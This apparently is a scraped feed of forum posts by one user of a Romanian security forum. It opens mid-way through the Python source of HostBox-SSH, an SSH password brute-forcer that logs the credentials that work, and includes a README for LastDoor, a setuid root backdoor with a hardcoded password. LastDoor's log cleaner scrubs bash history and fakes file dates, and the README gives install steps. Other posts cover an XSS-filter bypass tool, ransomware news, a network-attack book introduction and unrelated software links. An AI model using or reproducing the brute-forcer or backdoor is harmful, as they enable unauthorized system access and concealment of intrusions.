s.connect((h, 22)) s.close() for u in users: if breaksrv: breaksrv = False break if breakacc: breakacc = False next for p in passw: if breakacc: breakacc = False break if breaksrv: break if p == 'blank': p = '' if p == '-username': p = u ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) print "%s: Logging in with %s / %s" % (h,u,p) try: msg = ssh.connect(h, username=u, password=p) if msg == None: print("On Host: %s found login combination: %s / %s" % (h,u,p)) flogfile.write("On Host: %s found login combination: %s / %s\n" % (h,u,p)) ssh.close() if skipacc: breakacc = True if skipsrv: breaksrv = True except: pass if breaksrv: breaksrv = False break except Exception, e: print "%s: Host Unreachable. Skipping to next!" % (h) next print "Scan %i has finished." % (index) flogfile.close() def Scan(self, event): global SCAN_INDEX index = SCAN_INDEX hosts = self.listbox.GetStrings() skipacc = False skipsrv = False if self.skipacc.GetValue(): skipacc = True if self.skipsrv.GetValue(): skipsrv = True thread.start_new_thread(self.funcScan,(hosts,index,skipacc,skipsrv)) SCAN_INDEX += 1 wx.MessageBox('Scanner started, positive results will be written to the log directory', 'Info', wx.OK | wx.ICON_INFORMATION) def Usr(self, event): sel = self.usernames text = sel renamed = wx.GetTextFromUser('Rename item', 'Set usernames', text) if renamed != '': self.usernames = renamed def Psw(self, event): sel = self.passwords text = sel renamed = wx.GetTextFromUser('Rename item', 'Set passwords', text) if renamed != '': self.passwords = renamed def NewItem(self, event): filters = 'All files (*.*)|*.*|Stridsman Logfiles (*.slg)|*.slg' dialog = wxFileDialog ( None, message = 'Open something....', wildcard = filters, style = wxOPEN | wxMULTIPLE ) if dialog.ShowModal() == wxID_OK: selected = dialog.GetPath() dialog.Destroy() fobject = open(selected, "r") hostlines = fobject.readlines() fobject.close() if "# Nmap" in hostlines[0]: succimport = False for l in hostlines: if "Ports: 22/open/" in l: ip = l.split(' ') self.listbox.Append(ip[1]) succimport = True if succimport == False: wx.MessageBox('No open ssh ports found in the selected file (or not a greppable nmap log!)', 'Info', wx.OK | wx.ICON_INFORMATION) else: for lines in hostlines: lines = lines.strip('\n') self.listbox.Append(lines) def OnRename(self, event): sel = self.listbox.GetSelection() text = self.listbox.GetString(sel) renamed = wx.GetTextFromUser('Rename item', 'Rename dialog', text) if renamed != '': self.listbox.Delete(sel) self.listbox.Insert(renamed, sel) def OnDelete(self, event): sel = self.listbox.GetSelection() if sel != -1: self.listbox.Delete(sel) def OnClear(self, event): self.listbox.Clear() def printHelp(): os.system("clear") print 'HostBox-SSH.py -i <ip list> -u user1,user2,user3.. -p pass1,pass2,pass3.. [-1/-2]' print '\nBreak Option: -1: Break on account login' print '\n -2: Break on server login\n\n' def consoleScan(hostlist,usernames,passwords,skipacc,skipsrv): breakacc = False breaksrv = False users = [] passw = [] if ';' in usernames: users = usernames.split(';') elif ',' in usernames: users = usernames.split(',') else: users.append(usernames) if ";" in passwords: passw = passwords.split(';') elif "," in passwords: passw = passwords.split(',') else: passw.append(passwords) pathname = "" localtime = time.asctime( time.localtime(time.time()) ) localtime = localtime.replace(' ', '_') ext = ["logs/",localtime, ".slg"] pathname = pathname.join(ext) flogfile = open(pathname, "w") os.system("clear") for h in hostlist: s = socket.socket() try: s.connect((h, 22)) s.close() for u in users: if breakacc: breakacc = False next for p in passw: if breakacc: breakacc = False break if breaksrv: break if p == 'blank': p = '' if p == '-username': p = u ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) print "%s: Logging in with %s / %s" % (h,u,p) try: msg = ssh.connect(h, username=u, password=p) if msg == None: print("On Host: %s found login combination: %s / %s" % (h,u,p)) flogfile.write("On Host: %s found login combination: %s / %s\n" % (h,u,p)) ssh.close() if skipacc: breakacc = True if skipsrv: breaksrv = True except: pass if breaksrv: breaksrv = False break except Exception, e: print "%s: Host Unreachable. Skipping to next!" % (h) next print "Scan %s has finished." % (localtime) flogfile.close() def main(argv): app = wx.App() HostBox(None, -1, 'Oskar Stridsman\'s IT Resource: HostBox SSH Scanner') skipacc = False skipsrv = False infile = "" hostlist = [] try: opts,args = getopt.getopt(argv,"hi:u:p:12",["ifile=","ufile=","pfile="]) print opts,args if opts == []: app.MainLoop() else: for opt, arg in opts: if opt == '-h': printHelp() sys.exit() elif opt in ("-i", "--ifile="): infile = arg elif opt in ("-u", "--ufile="): usernames = arg elif opt in ("-p", "--pfile="): passwords = arg elif opt in ("-1"): skipacc = True elif opt in ("-2"): skipsrv = True if infile == "": printHelp() sys.exit() if usernames == "": printHelp() sys.exit() if passwords == "": printHelp() sys.exit() fobject = open(infile, "r") hostlines = fobject.readlines() if "# Nmap" in hostlines[0]: succimport = False for l in hostlines: if "Ports: 22/open/" in l: ip = l.split(' ') hostlist.append(ip[1]) succimport = True if succimport == False: print 'No open ssh ports found in the selected iplist (or not a greppable nmap log!' sys.exit() else: for lines in hostlines: lines = lines.strip('\n') hostlist.append(lines) consoleScan(hostlist,usernames,passwords,skipacc,skipsrv) except getopt.GetoptError: printHelp() sys.exit(2) if __name__ == "__main__": main(sys.argv[1:]) Download HostBox-0.1.1.tar.gz (3.9 KB) Source
  7. Last Door is a utility written to wipe specific entries in arbitrary log files and if setuid, will also execute arbitrary commands without logging any history. README ___________ | |Linux |<Last|Door>|Root- | --------- |Backdoor | O |& | |Log- | |Cleaner |___________|~r0ng Hackers2DevNull.blogspot.co.uk (The user bears responsibility) Release Dec 2012 -V1 For a full writeup of the program, please visit my blog, URL above. [+] What is it? It is a backdoor program which enables a non-root user to send root commands to system, and a log cleaner with several functions. [+] Features? - Hardcoded password, no prompt/blank screen unless correct password entered - No need for user to SU prior to running - Protection for virtual file systems - All commands sent to system as root - Log cleaner searches the file system for chosen strings, no finite log lists used - Log cleaner options: - Search string replace with new string (e.g. change your ip in the logs) - Search string delete string - Search string delete line - Search string delete file contents - Multi-string search/destroy at once - Includes hidden files - Maintains the file modified date despite making changes - On running the log cleaner, the process is forked as a background daemon - User sets timer prior to running so they can logout/exit, and it will clean up after you have gone. - If you don't logout prior to the process starting, the file search process will be displayed - If you do logout prior to the process starting this will allow your .bash_history to refresh and be included in the search (shoud you want to delete your ./LastDoor command for example). [+] Compile/use? - gcc LastDoor.c -o LastDoor -Wall (all std libs used) - cp LastDoor /bin/LastDoor (for example) - chmod u+s /bin/LastDoor (set the s bit) - non-rootuser:~# /bin/LastDoor (run!) Download LastDoor.tar (40 KB) Source
  8. si-n campanie
  9. Cei de la Bitdefender au anuntat astazi disponibilitatea unei aplicatii gratuite impotriva "virusului pirateriei" care a infectat milioane de utilizatori din intreaga lume prin intermediul unui mesaj fals aparent trimis din partea politiei. Pentru cei care nu au auzit deja, acest virus este cunoscut si sub denumirea de "virusul Politia Romana" si afiseaza un mesaj prin care incrimineaza proprietarul calculatorului afectat de piraterie, ulterior solicitand o suma de bani pentru deblocarea calculatorului. Virusul verifica adresa IP a victimei, o asigura ca mesajul este din partea politiei si o acuza de un delict pe care l-ar fi putut comite si fara sa-si dea seama. Fata de amenintari similare mai vechi, care trimiteau asa zise "amenzi" pentru pornografie, aceasta pune accentul pe infractiuni de piraterie software, a filmelor sau a albumelor muzicale. Atacatorii intimideaza utilizatorii cu mesaje localizate ce par a veni din partea autoritatilor din tari precum Romania, Statele Unite ale Americii, Marea Britanie, Germania, Austria si Olanda. La noi in tara, au fost solicitate plati ale unor sume de 100 de dolari sau 300 de lei pentru eventuala deblocare a computerului. Dupa cum stim cu totii pirateria este un fenomen global, astfel incat rata de raspandire a virusului este incredibila, iar numarul celor care au cazut prada escrocheriei creste pe zi ce trece. Avand originie ruseasca, astfel de virusi de tip "Ransom" reusesc sa blocheze complet calculatoarele infectate si sa convinga tot mai multi utilizatori sa plateasca in schimbul eliminarii restrictiilor. Solutia celor de la Bitdefender se adreseaza celor care au fost deja afectati de acest Trojan.Ransom.IcePol carora li se recomanda instalarea aplicatiei regasite aici si rularea acesteia in Safe Mode. via Virusul “Politia Romana” combatut - Yahoo! ?tiri România
  10. Fi8sVrs

    JPEGmini

    Reduce the file size of your photos by up to 5x, while keeping their original quality and JPEG format! Upload full albums Share on Picasa and Flickr Unlimited usage Completely free! Try It Now via JPEGmini - Your Photos on a Diet!
  11. nici mie nu imi listeaza ultimele thread-uri/posturi
  12. Fi8sVrs

    Modernizr

    Modernizr is a small JavaScript library that detects the availability of native implementations for next-generation web technologies, i.e. features that stem from the HTML5 and CSS3 specifications. Many of these features are already implemented in at least one major browser (most of them in two or more), and what Modernizr does is, very simply, tell you whether the current browser has this feature natively implemented or not. Unlike with the traditional—but highly unreliable—method of doing “UA sniffing,” which is detecting a browser by its (user-configurable) navigator.userAgent property, Modernizr does actual feature detection to reliably discern what the various browsers can and cannot do. After all, the same rendering engine may not necessarily support the same things, and some users change their userAgent string to get around poorly developed websites that don’t let them through otherwise. Modernizr aims to bring an end to the UA sniffing practice. Using feature detection is a more reliable mechanic to establish what you can and cannot do in the current browser, and Modernizr makes it convenient for you in a variety of ways: It tests for over 40 next-generation features, all in a matter of milliseconds It creates a JavaScript object (named Modernizr) that contains the results of these tests as boolean properties It adds classes to the html element that explain precisely what features are and are not natively supported It provides a script loader so you can pull in polyfills to backfill functionality in old browsers With this knowledge that Modernizr gives you, you can take advantage of these new features in the browsers that can render or utilize them, and still have easy and reliable means of controlling the situation for the browsers that cannot. Documentation Download Scr: Modernizr: the feature detection library for HTML5/CSS3
  13. Fi8sVrs

    Sketch

    Sketch is a professional vector graphics app with a beautiful interface and powerful tools. We set out to build a better app for graphic designers. Not to copy, but rather to improve. LEARN Download Source
  14. Fi8sVrs

    Slicy

    Slicy totally reinvents Photoshop slicing. To export PSD elements as assets for your website or app, rename your layer groups once and let Slicy do everything else. Designers and developers, rejoice! Slicy exports layer groups independently, giving you total freedom to move, overlap or even hide design elements. Tagging for export is easy while organizing your PSDs, and quickly saves you tons of time. You'll soon experience how natural this revolutionary new way of exporting is. Precision exporting, including transparency Wonderful for App, Web and icon design No grids or templates, just use your mockup AutoSize or explicitly define areas to export AutoRepeat when you save in PS (optional) For you, or a team — no plug-ins required Fantastic advanced canvas/group slicing 99% real-world PSD support, including CS6 Free Download Source
  15. din cate am auzit vizualizarile youtube se vor contoriza dupa timpul de vizionare al clipurilor
  16. X-Icon Editor is an HTML5 application (based on <Canvas>) that allows you to create high resolution icons that lets your sites shine with IE9 and above. With X-Icon Editor you can quickly get your site ready with a large icon which will be available for pinned sites and the new tab page. Create your own site icon today! Preview: http://xiconeditor.com/PreviewIcon.aspx?R=b4e23660-1f5c-4442-85db-343823021ebc Source
  17. Description snuck is quite different from typical web security scanners, it basically tries to break a given XSS filter by specializing the injections in order to increase the success rate. The attack vectors are selected on the basis of the reflection context, that is the exact point where the injection falls in the reflection web page's DOM. Having access to the pages' DOM is possible through Selenium Web Driver, which is an automation framework, that allows to replicate operations in web browsers. Since many steps could be involved before an XSS filter is "activated", an XML configuration file should be filled in order to make snuck aware of the steps it needs to perform with respect to the tested web application. Practically speaking, the approach is similar to the iSTAR's one, but it focuses on one particular XSS filter. Tutorial: Tutorial - snuck - how to use snuck - Automatic XSS filter bypass - Google Project Hosting Download: Downloads - snuck - Automatic XSS filter bypass - Google Project Hosting Owner: gentile....@gmail.com Google Project Hosting Source: snuck - Automatic XSS filter bypass - Google Project Hosting
  18. Metaprogramming Ruby Program Like the Ruby Pros Paolo Perrotta Introduction: Metaprogramming ...it sounds cool! It sounds like a design techniquefor high-level enterprise architects or a fashionable buzzword that hasfound its way into press releases.In fact, far from being an abstract concept or a bit of marketing-speak,metaprogramming is a collection of down-to-earth, pragmatic codingtechniques. It doesn’t just sound cool; it is cool. Here are some of thethings you can do with metaprogramming in the Ruby language:• Say you want to write a Ruby program that connects to an externalsystem—maybe a web service or a Java program. With metapro-gramming, you can write a wrapper that takes any method calland routes it to the external system. If somebody adds methodsto the external system later, you don’t have to change your Ruby wrapper; the wrapper will support the new methods right away. That’s magic!• Maybe you have a problem that would be best solved with a pro-gramming language that’s speci?c to that problem. You could goto the trouble of writing your own language, custom parser andall. Or you could just use Ruby, bending its syntax until it lookslike a speci?c language for your problem. You can even write your own little interpreter that reads code written in your Ruby-basedlanguage from a ?le.• You can remove duplication from your Ruby program at a levelthat Java programmers can only dream of. Let’s say you havetwenty methods in a class, and they all look the same. How about de?ning all those methods at once, with just a few lines of code?Or maybe you want to call a sequence of similarly named meth-ods. How would you like a single short line of code that calls allthe methods whose names match a pattern—like, say, all methodsthat begin with test ? T HE “M” W ORD 14 • You can stretch and twist Ruby to meet your needs, rather thanadapt to the language as it is. For example, you can enhance any class (even a core class like Array ) with that method you miss sodearly, you can wrap logging functionality around a method that you want to monitor, you can execute custom code whenever a client inherits from your favorite class...the list goes on. You arelimited only by your own, undoubtedly fertile, imagination.Metaprogramming gives you the power to do all these things. Let’s see what it looks like. The “M” Word You’re probably expecting a de?nition of metaprogramming right fromthe start. Here’s one for you: Metaprogramming is writing code that writes code. We’ll get to a more precise de?nition in a short while, but this one willdo for now. What do I mean by “code that writes code,” and how is that useful in your daily work? Before I answer those questions, let’s take a step back and look at programming languages themselves. Ghost Towns and Marketplaces Think of your source code as a world teeming with vibrant citizens: variables, classes, methods, and so on. If you want to get technical, you can call these citizens language constructs .In many programming languages, language constructs behave morelike ghosts than ?eshed-out citizens: you can see them in your sourcecode, but they disappear before the program runs. Take C++, for exam-ple. Once the compiler has ?nished its job, things like variable and method have lost their concreteness; they are just locations in mem-ory. You can’t ask a class for its instance methods, because by the time you ask the question, the class has faded away. In languages like C++,runtime is an eerily quiet place—a ghost town.In other languages, such as Ruby, runtime looks more like a busy mar-ketplace. Most language constructs are still there, buzzing all around. You can even walk up to a construct and ask it questions about itself. This is called introspection . Let’s watch introspection in action View
  19. The Seven Deadliest Attacks Series Seven Deadliest Network Attacks Mike Borkin Rob Kraus Stacy Prowell Introduction: Security is heavily contextual; the effectiveness of any security measures depends on the context into which they are deployed. What if you give keys to the janitor, and he or she leaves them in his or her unlocked car? Further security is often not incremen- tal ; insecurity in one area can lead to insecurity in all areas. Hackers might break into your machines and steal your proposals and bidding information, so you carefully secure your network. Hackers might break into employees’ home networks to steal passwords, e-mail accounts, or even hijack “secure” connections to break into your corporate network, so you institute policies about remote access. Hackers might park outside your building and “listen in” on your wireless network, so you encrypt it and use special measures to prevent the wireless signal from leaking outside the building. Hackers might use e-mail “phishing” and other “social engineering” attacks to gain access, so you add more policies and carefully train your staff and test them from time to time. Finally, comfortably secure and ready for anything, you unknowingly hire the hackers and fall victim to an “insider” attack. Life’s tough. What we think of as security is really a collection of policies and procedures that are, ultimately, about giving out information. Your employees (or even other parts of your infrastructure) need information to accomplish their mission. Security stands between your employees and accomplishing that mission. All too often serious secu- rity breaches start with some otherwise well-intentioned effort to get some useful work done. Sometimes, it is your employees who break your security; not necessarily because they have some evil purpose, but sometimes because they believe the mission is more important or that the security measures are unnecessary. The mission may be short term and absolutely critical. The effects of a security breach can take years to evolve or even to be detected. It is late in the day and you have a very important bet-your-company deliverable due out in the morning. You desperately need Software X to run in order to finish the Introduction xii deliverable, but Software X is being blocked by your firewall. You’ve tried adding rules to the firewall, you’ve tried calling the vendor, but nothing is working. Finally you disable the firewall, finish the deliverable, and ship. Will you remember to re-enable the firewall? Did you monitor your network while the firewall was down? The view that security is a collection of tradeoffs, or a series of calculated risks, assumes a continuous nature to security. The belief that you can trade a little insecu- rity for some other gain is often a misunderstanding of the nature of security. This is akin to saying you will allow anyone to withdraw money from your bank account but only as much as they can withdraw in 10 minutes. The mistake is that the two things (in this case money and time) are not directly related. how thIs Book Is organIzed This book identifies seven classes of network attacks and discusses how the attack works, including tools to accomplish the attack, what are the risks of the attack, and how to defend against the attack. Seven attacks were chosen: denial of service, war dialing, penetration testing, protocol tunneling, spanning tree attacks, man-in-the- middle, and password replay. These are not mutually exclusive; you can exploit the spanning tree protocol, for example, to launch a denial-of-service attack. These were chosen because they help illustrate different aspects of network security; the principles on which they rely are unlikely to vanish any time soon, and they allow for the possi- bility of gaining something of interest to the attacker, from money to high-value data. Chapter 1, “Denial of Service,” illustrates how even sophisticated networks can be crippled by a determined hacker with relatively few resources. Chapter 2, “War Dialing,” illustrates how a hacker can circumvent the hardened security perimeter of a network to access “softer” targets. Chapter 3, “Penetration ‘Testing,’” discusses the various tools and techniques used for penetration testing that are readily available to both the defenders and the attackers. Chapter 4, “Protocol Tunneling,” presents a method for deliberately subverting your network perimeter to “tunnel” prohibited traffic into and out of your network. Chapter 5, “Spanning Tree Attacks,” discusses the “layer 2” network responsible for knitting together your switches, routers, and other devices into a reliable net- work, and illustrates one way in which to exploit the weak security of this layer. Chapter 6, “Man-in-the-Middle,” discusses a very common attack pattern and just what an attacker can accomplish once he or she has inserted himself or herself into your data stream. Chapter 7, “Password Replay,” focuses on the security of passwords and other static security measures and how an attacker can use various techniques to gain unauthorized access. Introduction xiii This book is intended to provide practical, usable information. However, the world of network security is evolving very rapidly, and the attack that works today may (hopefully) not work tomorrow. It is more important, then, to understand the principles on which the attacks and exploits are based in order to properly plan either a network attack or a network defense. The authors chose the contents of this book because we believe that, underlying the attacks presented here, there are important principles of network security. The attacks are deadly because they exploit princi- ples, assumptions, and practices that are true today and that we believe are likely to remain true for the foreseeable future. Increasingly sophisticated criminal organizations launch network attacks as a seri- ous, for-profit enterprise. Similarly, well-funded governmental actors launch network attacks for political reasons or for intelligence gathering. Cyberspace is already a battlefield. Even if your network doesn’t have high-value intelligence and you don’t have deep pockets, you may be the target of a sophisticated attack because you have something else of value: machines and network access. An attacker may exploit your network to launch malware or to launch a network attack. Your Internet Protocol address may serve to give the attacker a level of plausible deniability. After all, would you want to launch the virus you just finished creating through your own Internet ser- vice provider connection? Attackers may use your machines for storage of informa- tion ranging from child pornography to stolen credit card numbers. Once these show up on your machines, it becomes your job to explain how they got there. Attackers can use compromised machines for command and control of deployed and distributed malware. This can result in your network being blacklisted or blocked as a distribu- tion source for malware. Is this the company image you want your customers to see? As networks grow and incorporate more sophisticated technologies, it can become difficult to maintain the necessary situational awareness. What were once “dumb” network nodes such as printers and network hardware may now have exploitable – and unexpected – vulnerabilities. These components are – in reality – just other computers on the network. Some of them have multiple interfaces that need to be considered, including Bluetooth, wireless, and wired connections. If one interface is well protected and another disabled, there may still be a third that is available. Network security requires considering the role and security concerns of each device, not just delivering the device and plugging it in. There are many reasons why network security is hard, ranging from the fact that networks are increasingly sophisticated and complex to the fact that economic incen- tives can work against proper security. Network security is essentially asymmetric warfare ; your adversaries can probe anywhere, but you have to defend everywhere. This creates a technological bias in favor of the attackers. Further, criminal organiza- tions live in a target-rich environment. If they are unsuccessful with one attack, they can move on and attack a different organization. The market for computer security products can – and does – fall prey to the asym- metric information problem. This is a case in which buyers of a product do not have as much information about the relative merits of the product as the sellers do. This creates a downward pressure on prices that, in turn, creates a downward pressure on quality. Introduction xiv Consider a used car market in which there are 100 good cars (the “plums”), worth $3000 each, and 100 rather troublesome ones (the “lemons”), each of which is worth only $1000. The vendors know which is which, but the buyers don’t. So what will be the equilibrium price of used cars? If customers start off believing that the probability that they will get a plum is equal to the probability that they will get a lemon, then the market price will start off at $2000. However, at that price only lemons will be offered for sale, and once the buyers observe this, the price will drop rapidly to $1000 with no plums being sold at all.1 ConCLusIon Network security depends on many factors, and perfect network security is impossible. Network protocols can be inherently insecure in surprising ways. Cryptographic func- tions that are essential to network security can fall prey to sophisticated mathematical attacks. The algorithms that implement protocols or cryptography can contain bugs. Even otherwise correct code can fall prey to the effects of being run on a computer; errors exist in chip designs, and the use of finite-precision math on computers can result in unexpected effects that can be exploited. This is all good news for attackers—but not so much for defenders. Of course, all is not lost. As a network administrator, you may have other factors on your side, including support by law enforcement, governmental agencies, and trusted third parties such as CERTA and SANS.B You have to control what you can. Stay educated on threats and responses. Make sure procedures support good security, and that personnel are properly trained. Make plans to deal with attacks. Most impor- tantly, you need to understand how and why network attacks work. It is our hope that this book will contribute to that goal. endnote 1. Anderson R. Why information security is hard – an economic perspective. Proceedings of the 17th Annual Computer Security Applications Conference (ACSAC); 2001 Dec. A See www.cert.org/ B See www.sans.org/ Download
      • 1
      • Upvote
  20. I'm releasing the newest Slax 7 build as a release candidate 1. It has KDE4 with many applications from kde network, kde multimedia, kde games, pidgin IM, FireFox, MPlayer and more, the entire system fits 183MB for the 32bit and 188MB for the 64bit variant, and runs perfectly fine on boxes with 256MB of RAM and more. This is most likely the version which contains all the programs for final Slax release. Development tools are still missing though. Wait, there is more! Before I show you the download links, I'd like to remind you about the opportunity to get Slax on a cool USB device when it is released. If you wish to support Slax or just give a cool present to some of your friends, get Slax 7 on the most stylish USB Flash Drive available nowadays: Kingston DataTraveler SE9. Features: Stylish metal casing Small form factor Easily attaches to your keys High durability Slax 7 preinstalled, ready to go PDF manual explaining Slax internals Device capacity 16GB The price is set to only $25 including worldwide shipping, fair enough. Shipping will start at the beginning of December, so estimated delivery time is December 15, should be soon enough before Christmas. If you are interested in getting such awesome device with such awesome OS on it, fill in your email address below. You're not going to pay anything yet, you'll just join google group called "slax-preorder" so I could send you instructions how to actually make your order later, probably at the beginning of December. Download current Slax release Slax 7 - KDE 4 - 32bit ISO - 184MB (for CD/DVD) * Slax 7 - KDE 4 - 32bit ZIP - 184MB (for USB) * Slax 7 - KDE 4 - 64bit ISO - 189MB (for CD/DVD) * Slax 7 - KDE 4 - 64bit ZIP - 189MB (for USB) * * links updated on 2012-11-08 Thank you very much for using Slax! Via - Slax 7 release candidate 1 - Tomas-M.com blog
  21. Nov. 6, 2012: The MasterCard Display Card, manufactured by NagraID Security, looks and functions almost exactly like a regular credit card but features an embedded LCD screen and touch-sensitive buttons. (MasterCard) What’s in your wallet? MasterCard has introduced a new high-tech credit card -- -- one that looks and functions almost exactly like an ordinary card, save for the integrated display and numerical keypad. The screen looks and acts like the display on a calculator; it should boost security by allowing the cardholder to generate single use numerical passwords for authentication. MasterCard calls it Display Card technology, and unveiled it Nov. 7 in collaboration with Standard Chartered Bank Singapore. “Instead of sending customers another bulky token, could we replace something which already exists in the customer’s wallet?” asked V. Subba, regional head of retail banking products for Standard Chartered Bank. “That was when credit, debit and ATM cards, immediately came to mind.” Banks looking to boost security for online banking use a separate authentication token or device, the company noted. A Display Card could do both -- and in the future it could incorporate additional functionalities and be able to indicate other real time information such as available credit balance, loyalty or reward points, recent transactions and so on. “With the continued growth in online and now mobile initiated remote payments, consumers are naturally demanding increased security,” explained Matthew Driver, a regional president for MasterCard. “The innovative features of the Display Card serve to address this need, whilst empowering consumers to do so much more with their payment cards.” The card is manufactured by NagraID Security. Sources: MasterCard launches new credit card with LCD screen, keyboard | Fox News https://www.nidsecurity.com/
  22. Fi8sVrs

    platisms ?

    recomand www.voxline.ro insa trebuie sa ai firma/inteprindere individuala
  23. This really is the most epic set of 2400 flag icons you’ll come across. We use them ourselves so what better endorsement do you need? We’ve created a flag for every major country in the world, plus a few more. And we’ve created them in several sizes so they’ll look great no matter where you’re using them – 16×16, 24×24, 32×32, 48×48, and 64×64. We’ve also provided them in 2 variants – as flat and standard, and with a lovely glossy finish. Download Source https://www.gosquared.com/resources/2400-flags
  24. cum sa mearga daca el nici nu le verifica inainte sa posteze, posteaza toate rebuturile pe forum Malwr - Analysis of 9c493af5b85ba1a5e95b5bc2a199f563
  25. A trip on public transport or to the local coffee shop might give the impression that touchscreens are everywhere, but scientists at Autodesk Research of the University of Alberta and the University of Toronto are looking to take the ubiquity of touch interfaces to the next level. They are developing a “Magic Finger” that allows any surface to detect touch input by shifting the touch technology from the surface to the wearer’s finger. Magic Finger doesn't look like much at the moment. In fact, with its LED light it looks a bit like a child’s attempt at an ET costume prop. It’s a proof-of-concept prototype made up of a little Velcro ring that straps to the wearer’s fingertip with a trail of wires leading to a box of electronics. But what it does blurs the line between the digital and real world. On the ring there are a pair of optical sensors. One is a low resolution, high-speed sensor for tracking movement, which wouldn't be very impressive because it makes the device just a mouse you strap to your finger. However, Magic Finger adds a new dimension with a high-resolution camera, which is able to detect 32 different surface textures with 98 percent accuracy. This allows Magic Finger to recognize what it touches, such as leather bag or a table or a magazine page, and with this information turn various surfaces into interfaces for devices or a way of passing information. Programmed to the wearer’s personal preferences, the Magic Finger can make non-digital objects into digital interfaces. An annoying smartphone ringing can be muted by touching the bag that it’s in. The wearer can start an app or send a saved text message by touching a logo on their shirt. Pinch commands and other gestures can be used for tablet or computer control without actually touching the device, and information can be passed to a receiving device by touching it. Sources: Magic Finger turns any surface into a touch interface Magic Finger: Always-Available Input through Finger Instrumentation - Publications - Autodesk Research Optical finger input lets you control a PC from nearly any surface | DVICE
×
×
  • Create New...